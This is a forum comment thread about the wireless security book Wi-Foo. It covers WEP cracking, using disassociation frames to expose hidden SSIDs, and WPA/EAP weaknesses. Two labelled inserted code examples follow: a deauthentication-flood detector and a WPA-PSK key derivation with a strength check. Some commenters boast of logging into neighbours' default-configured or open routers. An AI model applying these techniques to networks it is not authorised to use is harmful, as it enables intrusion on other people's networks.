      If the MAC address is the kind of information that you can glean from captured packets, then you might want to consider also cycling the MAC addresses of your devices on a regular basis as well. I mean, for the utmost in security. It depends, I suppose, on how much somebody wants to get inside your network and whether or not you know about it...

      --
      Reinvent the wheel only at either a lower cost, greater effectiveness, or your own personal enrichment and satisfaction.
  17. wireless boosting? by dextr0us · · Score: 0, Offtopic

    Hey, i'm just getting into wifi, and i want to know a couple websites for boosting my wireless range, my college is about a mile away, and i'd like to get the signal there.

    --
    "Martha Stewart can lick my Scrotum......do i have a scrotum?" -- Sharon Osbourne
    3. Re:wireless boosting? by mrconnors · · Score: 1

      Depends on the brand of your router, but I have seen some really good performance out of the firmware at http://sveasoft.com/

      --
      Great spirits have always found violent opposition from mediocrities. - Albert Einstein
  18. Re:NJ comes out of the closet; leaves office. by Anonymous Coward · · Score: 0

    gay!=pedo

  19. Disable SSID not all it's cracked up to be. by Anonymous Coward · · Score: 0

    There are performance problems and it still can be sniffed:

    http://www.tisc2002.com/newsletters/416.html

  20. Read mine for free by rworne · · Score: 5, Interesting

    I did something similar for my Master's Thesis.

    Mainly I looked at various tools and how effective they were. I also looked at setups in the surrounding neighborhood and pwn3d (with permission) the campus VPN via the wireless network.

    --
    I tried every decent and legal way I could think of to resolve the issue w/the business before I rented the chicken suit
  21. Re:Bad Name by AK+Marc · · Score: 1

    You must have missed out on all the americanisms. "Foo" has been coopted (with the misspelling) to mean skill, and must be combined with another noun. "Boy, she has some dance foo going." "He has some serious computer foo, he broke into that network like it was nothing." And of course, all the people that post stupid responses but get moderated up anyway have Slashdot foo.

  22. wep is secure? by 8400_RPM · · Score: 1

    I've been trying to hack wep for days in my test lab. With newer network cards, it seems wep is more secure than people give it credit for. After over 100 million encrypted packets, I had 0 interesting packets....

    1. Re:wep is secure? by rworne · · Score: 1

      Firmware after early 2001 implements "weak key avoidance" or WEP+. I've collected from 16M to 20M packets and have not been able to crack a key although I've had plenty of interesting packets.

      Wanna try something fun? Use a 40-bit WEP key and try Newsham's attack, that's scary.

      --
      I tried every decent and legal way I could think of to resolve the issue w/the business before I rented the chicken suit
    2. Re:wep is secure? by Anonymous Coward · · Score: 0

      "After over 100million encrypted packets, I had 0 interesting packets.... "

      Hey, it's your own fault if your lab net is boring. Perhaps you should get on there and surf some porn? Or do some online banking? That would generate some more interesting packets, I bet.

    3. Re:wep is secure? by Anonymous Coward · · Score: 0

      Not exactly all firmware, WEP+ is Proxim's proprietary weak IV avoidance algorithm. It has been dumped since the TKIP adoption.

    4. Re:wep is secure? by rworne · · Score: 1

      Yes, but Prism firmware also has weak key avoidance as well. Proxim/Lucent just give it a cool-sounding name.

      --
      I tried every decent and legal way I could think of to resolve the issue w/the business before I rented the chicken suit
  23. About disabling SSID broadcasting. by Anonymous Coward · · Score: 0

    Though it's nice cause it is incompatible with Windows XP WZC, a simple disassociation frame (a la airjack) will force any client to broadcast it, making the protection quite useless.
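    Because the trick described in the post above relies on sending disassociation or deauthentication frames, the defensive counterpart is a wireless IDS check for bursts of them. As an added example that is not code from the thread, here is a minimal detector run over constructed raw 802.11 frames; all MAC addresses in it are made up.

    ```python
    """Spot deauthentication / disassociation floods in raw 802.11 frames.

    Added example, not code from the thread. Kicking clients off so that they
    re-probe for a hidden SSID takes many deauth/disassoc frames, so a wireless
    IDS sensor can flag a source that sends a burst of them. The frames below
    are constructed sample data; all MAC addresses are made up.
    """
    from collections import defaultdict
    import struct

    DISASSOC, DEAUTH = 10, 12   # 802.11 management-frame subtypes
    BROADCAST = "ff:ff:ff:ff:ff:ff"


    def mac_str(raw: bytes) -> str:
        return ":".join(f"{b:02x}" for b in raw)


    def mac_bytes(text: str) -> bytes:
        return bytes(int(part, 16) for part in text.split(":"))


    def build_frame(subtype: int, da: str, sa: str, bssid: str,
                    reason: int, seq: int = 0) -> bytes:
        """Minimal deauth/disassoc frame: 24-byte MAC header + 2-byte reason code."""
        frame_control = bytes([subtype << 4, 0x00])      # version 0, type 0 (mgmt)
        header = (frame_control + b"\x00\x00" +             # duration
                  mac_bytes(da) + mac_bytes(sa) + mac_bytes(bssid) +
                  struct.pack("<H", seq << 4))              # sequence control
        return header + struct.pack("<H", reason)


    def parse_mgmt_frame(frame: bytes):
        """Return the fields of a deauth/disassoc frame, or None for anything else."""
        if len(frame) < 26:
            return None
        fc = frame[0]
        version, ftype, subtype = fc & 0x3, (fc >> 2) & 0x3, fc >> 4
        if version != 0 or ftype != 0 or subtype not in (DISASSOC, DEAUTH):
            return None
        return {"subtype": subtype,
                "da": mac_str(frame[4:10]),
                "sa": mac_str(frame[10:16]),
                "bssid": mac_str(frame[16:22]),
                "reason": struct.unpack_from("<H", frame, 24)[0]}


    def detect_floods(captures, threshold: int = 10, window: float = 1.0):
        """captures: iterable of (timestamp_seconds, raw_frame).

        Alerts once per (source, BSSID) when `threshold` deauth/disassoc frames
        arrive within `window` seconds. One deauth is normal (a client leaving);
        dozens per second, especially to the broadcast address, are not.
        """
        recent = defaultdict(list)
        alerted, alerts = set(), []
        for ts, raw in captures:
            info = parse_mgmt_frame(raw)
            if info is None:
                continue
            key = (info["sa"], info["bssid"])
            stamps = [t for t in recent[key] if ts - t <= window] + [ts]
            recent[key] = stamps
            if len(stamps) >= threshold and key not in alerted:
                alerted.add(key)
                alerts.append({"sa": key[0], "bssid": key[1], "count": len(stamps),
                               "broadcast": info["da"] == BROADCAST,
                               "first": stamps[0], "last": ts})
        return alerts


    # Constructed sample capture (made-up addresses): one normal deauth, a data
    # frame that must be ignored, then 12 broadcast deauths within 0.55 s that
    # carry the access point's address as source.
    AP, CLIENT = "00:11:22:33:44:55", "66:77:88:99:aa:bb"
    SAMPLE_CAPTURE = [
        (0.0, build_frame(DEAUTH, CLIENT, AP, AP, reason=3)),   # STA leaving
        (5.0, bytes([0x08, 0x01]) + b"\x00" * 30),              # data frame
    ] + [(10.0 + i * 0.05, build_frame(DEAUTH, BROADCAST, AP, AP, reason=7, seq=i))
         for i in range(12)]

    if __name__ == "__main__":
        for alert in detect_floods(SAMPLE_CAPTURE):
            print(alert)
    ```
    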

    1. Re:About disabling SSID broadcasting. by Anonymous Coward · · Score: 0

      Just one of the many reasons not to use Windoze Zero Config. WZC was already the most poorly implemented GUI in XP, but brace yourself for the hideous SP2 version. Yep, the new graphics are in, but WPA2 compatibility was left out. Trustworthy computing... when we finally get around to it.

  24. What about 802.1x? by Anonymous Coward · · Score: 0

    I just finished setting up a Proxim AP in my corporate office. Used 802.1x; signed certificates, radius authentication and dynamic rekeying. I'd be very curious about the author's methods for cracking 802.1x. Can't imagine how it's possible. Has anyone read the book?

  25. Re:Bad Name by Agent+Green · · Score: 2, Funny

    And then there's B.A. Baracus of the A-Team...'cos he always pitied the foo'.

    --
    // Agent Green (Ian / IU7 / KB1JQO)
    // IEEE 802.3: All 10base Are Belong To Us
  26. Factory settings, gotta love 'em by glass_window · · Score: 3, Interesting

    As I sit here at my aunt's house, I am currently logged in via the friendly neighborhood linksys 802.11b router (BEFW11S4) complete with its default settings. I've been enjoying internet access all week and I thought I'd check to see if they at least changed the factory default settings and lo and behold I logged right in. It's good to know I can remove my mac address before I leave (just in case).

  27. Wireless Protected Access by el+americano · · Score: 1

    You should expect, with a name like Wi-Foo, that the author will try to mystify a rather simple topic. There's nothing here that isn't covered better on the Internet. The state of wireless hacking is sniffing obscured but open networks, compromising WEP, and compromising LEAP.

    Wireless Protected Access (WPA) with TKIP or AES is all you need to stop the author and any of his readers. Someone mentioned WPA-PSK - end of drama. [No weak passphrase, of course] If you have a RADIUS server running anyway, or need to serve a large pool of users, try WPA EAP-TLS. The real security issues faced by corporate wireless network administrators, such as rogue access points and other AP management issues, are better dealt with by books for security administrators, not wanna-be hackers.

    The free chapter is filled with vague, yet dismissive descriptions of non-existent PSK and TKIP attacks. In fact, the reader would have to surpass the author to learn how to really implement a man-in-the-middle attack, based on those "buy this hardware and use this software" descriptions. Use it how?! The obligatory reprint of the published WEP exploitation theory did not include any additional practical code. The rest, it seems, is left as an exercise for the reader, as it is everywhere else. How did this get such a fawning review?

    --
    Those are my principles. If you don't like them I have others. -Groucho Marx
    1. Re:Wireless Protected Access by Anonymous Coward · · Score: 0

      It seems to me that you have not read through the book, just glanced through the free chapter and the table of contents, if you arrive at such conclusions.

      I am a big fan of wireless and security myself and I have to agree that some things that you say are indeed true, but the rest of your post is utter bullshit. From your nick, I should expect that you eat hallucinogenic cactuses ala Carlos Castaneda and completely miss the real world picture of the wireless security out there.

      Pretty much every topic you can think of is covered on the Internet, so what?! If you want to buy something on which there is no information on the web, go and buy the next edition of a Harry Potter book, dude.

      What I truly like about Wi-Foo is that the information is collected in one place, analyzed, and presented to the readers in such a way that wi-foo makes a good buy for readers with varying levels of skill and determination.
      What is out there that you can compare wi-foo against? Maximum Wireless Security or maybe Wardriving guide?

      To reinforce my point that mescaline is a rather strong hallucinogenic, mind-altering drug, using your example obviously, I have to bring statistics and common sense to my side.
      How many APs have been sold in the world that do not support WPA? How many people who have such APs would buy a new one, just to have these three wonderful letters on the box? They would not care, as 99.9% would not even know what the hell it stands for.
      Suggesting a RADIUS server is OK for corporate users willing to spend $$$ on protecting the wireless infrastructure, but for home use with one AP and one client it is one of the dumbest ideas I have ever heard (is it LSD now? ;)

      Coming to the free chapter and potential attacks: initially you wrote that you didn't like information that is available on the net being included in the book, and now you say that you do not like the presence of hypothetical attacks? I believe the authors were writing a book, not a tool. Full stop.
      If you are as clever as you want everybody to think you are, why don't you write such a tool yourself? What are you famous for, apart from criticizing what you have not even seen or read?

      IMHO, Wi-Foo is definitely the best book available on wireless security, and I am glad that I have bought it.

      To answer your last comment "How did this get such a fawning review?" I can suggest that not everybody is as "smart-arse" as yourself. I really find the viewpoint of "everybody is dumb, and I am the clever one" to be rather limited and idiotic.

      Finally, dude, stop eating these cactuses.

    2. Re:Wireless Protected Access by Anonymous Coward · · Score: 0

      WEP looked pretty secure when it was just released. CCMP looks pretty secure now. Only time will tell whether it is true or not. Anyway, there was a fat report claiming that only 22 % of WPAv1-enabled devices from different vendors can interoperate. I don't even dare to think what that value would be with WPAv2. So, old good WEP is with us to stay, want it or not.

      By the way, TKIP-PSK key-from-passphrase generation algorithm is, indeed, flawed - the book is right on that. And you forgot to mention EAP-MD5, which is flawed but I've seen it in use many times (fallback solution due to some compatibility problems?). Also, if you need to serve a large pool of users, EAP-TLS is a bad choice, unless you really want to distribute all these client side certificates for fun. EAP-PEAP is a much better choice if you don't want to pay Funk Software for the Odyssey suite to use EAP-TTLS or stick to purely Cisco WLAN with EAP-FAST.

      As to the wi-foo book, I think it deals with the wireless defense issues much better than any sysadmin-oriented book I came across before. And I don't think they wanted to provide canned attacks a la "Hacking Exposed" but are more trying to inspire people to develop their own tools a la Schiffman's "Writing Open Source Security Tools" and provide some directions for such development. Nothing wrong with that. Btw, liked their WEPWedgie description/modifications. Wonder when the second version of this great tool comes out. Read the whole thing!

    3. Re:Wireless Protected Access by el+americano · · Score: 1

      It seems to me that you have not read through the book, just glanced through the free chapter and the table of contents, if you arrive at such conclusions.

      Imagine, basing my comments on the actual contents of the book. You have nothing to complain about here, I think. From what I've seen, I'm not going to waste my $35 for the whole book.

      Pretty much every topic you can think of is covered on the Internet, so what?!

      Usually a book presents more and better organization than what is found on amateur websites. We disagree on whether this book is worth charging for.

      How many APs have been sold in the world, that do not support WPA? How many people who have such APs would buy a new one...

      We are presuming people who care about security, right? $60 for a WPA enabled G access point is cheap. If we're talking about really old stuff, they'll want to upgrade from 802.11b anyway.

      Suggesting a RADIUS server is OK for corporate users willing to spend a $$$ on protecting the wireless infrastructure, but for for a home use of one AP and one client...

      I didn't say 1 AP and 1 client. For someone with a home network who is already running RADIUS, TLS is not a big overhead. Surely, someone with Wi-Foo like yourself would have no problem setting up Free RADIUS and Open CA.

      I hope I've been able to answer some of your questions, but if your position continues to be that I'm on drugs and you're not, then you should just ask yourself, what is the best wireless security that you have been able to defeat with your Wi-Foo? Oh, is that all? What does THAT tell you, Grasshopper?

      --
      Those are my principles. If you don't like them I have others. -Groucho Marx
    4. Re:Wireless Protected Access by el+americano · · Score: 1

      WEP looked pretty secure when it was just released.

      Excuse me, WEP was a known vulnerability even before it was released. WPA and RSN are expected to provide a sufficient number of years of protection before future processing power is able to defeat them.

      Anyway, there was a fat report claiming that only 22 % of WPAv1-enabled devices from different vendors can interoperate.

      I hadn't heard, but this was probably before Wi-Fi certification became so commonplace. Anything with a Wi-Fi logo supports WPA and is proven to interoperate with the major chipset manufacturers.

      By the way, TKIP-PSK key-from-passphrase generation algorithm is, indeed, flawed...

      PSK with weak passwords is theoretically attackable. I don't think there's a script for the kiddies yet, but if you choose a passphrase like "i read about this on slashdot, Wi-Fooers!", then you are not at risk from that attack.

      Yes, I would choose to distribute the user certs for TLS. There are many management tools for this. The problem with PEAP is that the CA cert is widely distributed, if not actually public, which could allow someone to attack weak passwords.

      I'm glad you got something out of the book. I do think they present it as a practical guide, but then are too vague in spots, and even resort to hand waving at the higher end. Take their advice on acquiring a WLAN card with the Prism chipset. Many of the manufacturers they mention don't sell Prism based cards anymore. Just another example of how you have to figure it out yourself anyway (as with most of the software). So, who needs the book?

      --
      Those are my principles. If you don't like them I have others. -Groucho Marx
    5. Re:Wireless Protected Access by Anonymous Coward · · Score: 0

      Imagine, basing my comments on the actual contents of the book. You have nothing to complain about here, I think. From what I've seen, I'm not going to waste my $35 for the whole book.

      > You cannot base the comments on the actual contents if you didn't "waste your $35 for the whole book" - plain and simple. Don't forget that what is given online for free is determined by the publisher (to my knowledge anyway) and is likely to be something they would consider to be sales-boosting, not obviously the most deep & informative.

      Usually a book presents more and better organization than what is found on amateur websites. We disagree on whether this book is worth charging for.

      > How much is a CWSP Guide as compared to Wi-Foo and which book gives more technical info and is more practical ?

      We are presuming people who care about security, right? $60 for a WPA enabled G access point is cheap. If we're talking about really old stuff, they'll want to upgrade from 802.11b anyway

      > The upgrade is far from being obvious. For many, even half-duplex 2 Mbps is enough. Don't forget that there are still corps and orgs that use 802.11 FHSS, low ISM band Breezenet and so on. Besides, many organizations such as the health services or large retail chains paid millions for deploying many hundreds if not thousands of 802.11b AP's and simply can't afford to throw them away and spend more millions just to support CCMP. And not all of these AP's are easily upgradeable to WPAv1; besides, for huge networks like that such an upgrade is neither fast nor cheap (yes, they need better sysadmins and more of them, but where would they get them and would they want to pay for it?)

      I didn't say 1 AP and 1 client. For someone with a home network who is already running RADIUS, TLS is not a big overhead. Surely, someone with Wi-Foo like yourself would have no problem setting up Free RADIUS and Open CA.

      > Actually the book does describe exactly that in a great detail, also dwelling a lot on LDAP, NoCat, setting up Open Source wIDS sensors and so on. Any other literature sources that do the same, please ?

      I hope I've been able to answer some of your questions, but if your position continues to be that I'm on drugs and you're not,

      >Actually, I do not think you are on drugs. I was simply picking on your nick without knowing you the same way you picked on the book's (humorous) name without reading it all. This gives you the taste of your own medicine: similia similibus curantur.

      then you should just ask yourself, what is the best wireless security that you been able to defeat with your Wi-Foo?

      > A WPAv1-protected WLAN via a man-in-the-middle attack as implemented by Max Moser's Hotspotter.
      Won't mention WLANs protected by IPSec running IKE in aggressive mode, Wavesec and older versions of PPTP (See the PPTP security analysis by Zen Parse of Teso Team).

      Oh, is that all?

      > Yes, and in the case of the WPAv1 WLAN it is, of course
      1. a Windows, not the security protocol's flaw
      2. it is now patched
      but
      1. Network was still broken into
      2. Timely patching habits of MS admins are cherished around the world.

      What does THAT tell you, Grasshopper?

      > that even if the protocol is reasonably fine, there would still be foobared implementations making it pretty useless.

    6. Re:Wireless Protected Access by Anonymous Coward · · Score: 0

      Excuse me, WEP was a known vulnerability even before it was released.

      > Then what's the point of releasing it? (Besides, releasing a security safeguard knowing that it is flawed and without warning the users about the flaw == very fat lawsuit. Was the standards committee sued?) Also, would it make any sense if someone released a VPN suite using 16 bit DES keys or simple XORing now? Actually, for more than a year after the FMS attack was published, many in the standard group still denied the attack's practicality.

      WPA and RSN are looking forward to provided a sufficient number of years of protection before future processing power is able to defeat it.

      >WEP was not defeated via processing power.

      PSK with weak passwords is theoretically attackable. I don't think there's a script for the kiddies yet

      >Not in the public domain.

      if you choose a passphrase like "i read about this on slashdot, Wi-Fooers!", then you are not at risk from that attack.

      >how many real world users remember passphrases of that length without writing them down on a sticker on their box? Also, the main risk presented by the Moscowitz attack is not from the outside wardrivers, but from the same company employees who do know the shared passphrase and then can calculate session keys of other employees to own their traffic.

      Yes, I would choose to distribute the user certs for TLS. There are many managment tools for this.

      > How secure is the certs distribution provided by these tools, in particular if we are talking about the distribution over wireless? Won't it introduce another good point for crackers to break in?

      The problem with PEAP is that the CA cert is widely distributed, if not actually public, which could allow someone to attack weak passwords.

      > So, 8021x/EAP-PEAP is crackable, after all :)

      I glad you got something out of the book. I do think they present it as a practical guide, but then are too vague in spots, and even resort to hand waving at the higher end.

      >Looks more like direction pointing for me.

      Take their advice on acquiring a WLAN card with the Prism chipset.

      >Are there any other wireless chipsets with specs as open as those of ex-Intersil's Prism ?

      Many of the manufacturers they mention don't sell Prism based cards anymore.

      >eBay still does. And it usually takes 1-2 years to develop, edit and publish a fat book, so some info will inevitably be obsolete by that time. Check out the versions of services and tools described in many O'Reilly tomes, Hacking Exposed series and so on. Despite this, these books are still useful to have and I'm running out of room space to store them.

      Just another example of how you have to figure it out yourself anyway (as with most of the software). So, who needs the book?

      >Someone who wants a logical framework, food for thought and directions for development instead of being spoon-fed.
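      The passphrase-to-key points raised above (the flawed TKIP-PSK passphrase derivation, weak passphrases, and colleagues who share the passphrase) all come down to the one derivation IEEE 802.11i specifies: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits). The following added example, not code from the thread or from the book, computes it the way the wpa_passphrase utility does and adds a length and character-class strength check; that strength heuristic is my own assumption, not part of any standard, and "ExampleSSID" is a constructed name.

      ```python
      """WPA-PSK: the passphrase and SSID alone determine the 256-bit PMK.

      Added example (not from the thread or from Wi-Foo). Derivation per IEEE
      802.11i: PSK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes),
      the same value the wpa_passphrase utility prints. The strength estimate is a
      plain character-class heuristic added here, not part of any standard.
      """
      import hashlib
      import math
      import string


      def validate_passphrase(passphrase: str) -> None:
          """802.11i allows 8 to 63 printable ASCII characters (0x20..0x7e)."""
          if not 8 <= len(passphrase) <= 63:
              raise ValueError("WPA passphrase must be 8-63 characters long")
          if any(not 0x20 <= ord(c) <= 0x7E for c in passphrase):
              raise ValueError("WPA passphrase must be printable ASCII")


      def wpa_psk(passphrase: str, ssid: str) -> bytes:
          """Pairwise Master Key shared by every station that knows the passphrase.

          The PMK depends only on (passphrase, SSID), so anyone who knows the
          shared passphrase (a colleague, say) holds the same PMK that every other
          client derives its session keys from; that is the insider risk above.
          """
          validate_passphrase(passphrase)
          return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                                     ssid.encode("utf-8"), 4096, dklen=32)


      def estimate_bits(passphrase: str) -> float:
          """Rough entropy: length * log2(size of the character classes used).

          Heuristic only; a dictionary phrase scores higher than it deserves.
          """
          classes = ((string.ascii_lowercase, 26), (string.ascii_uppercase, 26),
                     (string.digits, 10), (string.punctuation + " ", 33))
          alphabet = sum(size for chars, size in classes
                         if any(c in chars for c in passphrase))
          return len(passphrase) * math.log2(alphabet) if alphabet else 0.0


      def supplicant_psk_line(passphrase: str, ssid: str, min_bits: float = 80.0) -> str:
          """psk=<hex> line for wpa_supplicant.conf, so the clear-text passphrase
          need not be stored on the client; refuses passphrases that score weak."""
          bits = estimate_bits(passphrase)
          if bits < min_bits:
              raise ValueError(f"passphrase too weak (~{bits:.0f} bits, need {min_bits:.0f})")
          return "psk=" + wpa_psk(passphrase, ssid).hex()


      if __name__ == "__main__":
          # IEEE 802.11i test vector: passphrase "password", SSID "IEEE"
          print(wpa_psk("password", "IEEE").hex())
          print(f"'password' ~{estimate_bits('password'):.1f} bits")
          phrase = "i read about this on slashdot, Wi-Fooers!"   # the thread's example
          print(f"{phrase!r} ~{estimate_bits(phrase):.1f} bits")
          print(supplicant_psk_line(phrase, "ExampleSSID"))     # constructed SSID
      ```
      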

  28. Your efforts are futile by Anonymous Coward · · Score: 0

    http://www.moser-informatik.ch/

  29. Homebrew it. by Gordonjcp · · Score: 1

    Not a "Pringles can" antenna - they suck, badly. Nope, what you want is an 800g soup can to make a stopped waveguide antenna. Use one at each end. If that doesn't do it, use it as the feed for a dish.

  30. Re:Bad Name by Anonymous Coward · · Score: 0

    And then there's always this happy soldier who enjoys a warm cup of STFU.

  31. EAP-TLS by Jacco+de+Leeuw · · Score: 1

    You write in your thesis that EAP-TTLS and PEAP are more secure than EAP-TLS. Could you elaborate on this?

    --
    -------
    Warning: Slashdot may contain traces of nuts.
    1. Re:EAP-TLS by rworne · · Score: 2, Insightful

      IIRC, at the time the paper was written, EAP-TTLS and PEAP leaked the least amount of info to a possible attacker and had no known exploits at the time. Check the link offered in the bibliography, it explains it in more detail.

      The key point of that section (as miserably brief as it was, I admit) was to point out there are developments helping the situation, but the overall opinion is that wireless networks are not secure and people need to be aware of the traffic that is sent over them and what this traffic might reveal to an attacker.

      Frankly, I needed another semester to work on the thesis, but schedules are a pain.

      --
      I tried every decent and legal way I could think of to resolve the issue w/the business before I rented the chicken suit
  32. Wireless has made the internet free for me. by eBayDoug · · Score: 1

    I'm in the city.

    I have 2 or 3 open wireless networks to tap into at anytime, right from the office.

    I love my free internet.

    --
    Learn About Outsourcing. http://www.pioutsource.com